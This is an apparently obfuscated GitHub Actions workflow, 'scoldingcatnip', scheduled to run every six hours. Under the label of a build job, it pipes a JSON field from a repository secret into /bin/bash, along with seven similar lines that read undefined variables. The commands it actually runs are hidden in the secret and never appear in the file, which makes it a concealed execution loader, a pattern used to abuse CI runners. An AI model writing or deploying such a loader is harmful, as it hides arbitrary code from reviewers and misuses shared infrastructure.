name: scoldingcatnip
on:
  workflow_dispatch:
  schedule:
    - cron: '28 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: scoldingcatnip
        env:
          df53333: ${{ secrets.df53333 }}
        run: |
          echo $df53333 | jq -r .uniq1 | /bin/bash
          echo $gg3 | jq -r .cchr40 | /bin/bash
          echo $wbj666 | jq -r .lgjhg646 | /bin/bash
          echo $n3712 | jq -r .mhso00 | /bin/bash
          echo $cpy97717 | jq -r .y99753 | /bin/bash
          echo $uqcs950 | jq -r .rd082 | /bin/bash
          echo $aw653 | jq -r .tfktb6352 | /bin/bash
          echo $hcw0 | jq -r .cjf708 | /bin/bash

